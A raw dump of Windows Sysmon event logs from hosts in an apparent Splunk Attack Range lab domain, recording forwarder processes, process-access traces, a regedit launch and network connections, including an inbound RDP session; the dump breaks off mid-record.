154100x80000000000000001052177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.419{466BC892-F6B4-60EB-A57D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:50.222{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57374-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:53.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E2D63160AD0161CBFD4B8CA133B82C,SHA256=132920391233F5CC7E8AC255EE4F0B180940BD7E91D3C192923D051F4EBF3A0A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:46.112{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57375-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001052316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:45.790{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51151-false10.0.1.12-8000- 10341000x80000000000000001052315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.798{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.798{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.782{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.782{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.730{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.730{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.730{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B5-60EB-AA7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-AA7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B5-60EB-AA7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.656{466BC892-F6B5-60EB-AA7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.630{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.630{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.599{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CDEA7DAAD88E7A1BE2EB03AB3B10F93,SHA256=D8FE77D1B91496353B0AFBFEC87D6FB2DD715439AF5E62DB53C592424D725972,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:52.146{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-53376-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:53.590{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=405F63C43620F942F889F7068F324FD8,SHA256=D434A0FEC8E1EFDB29A4684FC2987B46C90BE75036D5A1B38EEF15B84402CC1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:53.590{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FB7C69E404B43F5E198F42171A9F90C,SHA256=96845B953152D10F83632522F0CA4EE12D22FA1399EC6590115D2F99CE0E100B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.502{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+3c57|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.483{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXE"C:\Windows\regedit.exe" C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-F6B5-60EB-0076-080500000000}0x50876003HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC7910DC647CEAED360A927937667D1,SHA256=050604AFB07A519A132F0DD60A7ED74418768D75A081D9BDF272AD4EAFA07D3D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.464{466BC892-F6B5-60EB-A67D-00000000CF01}14287284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program 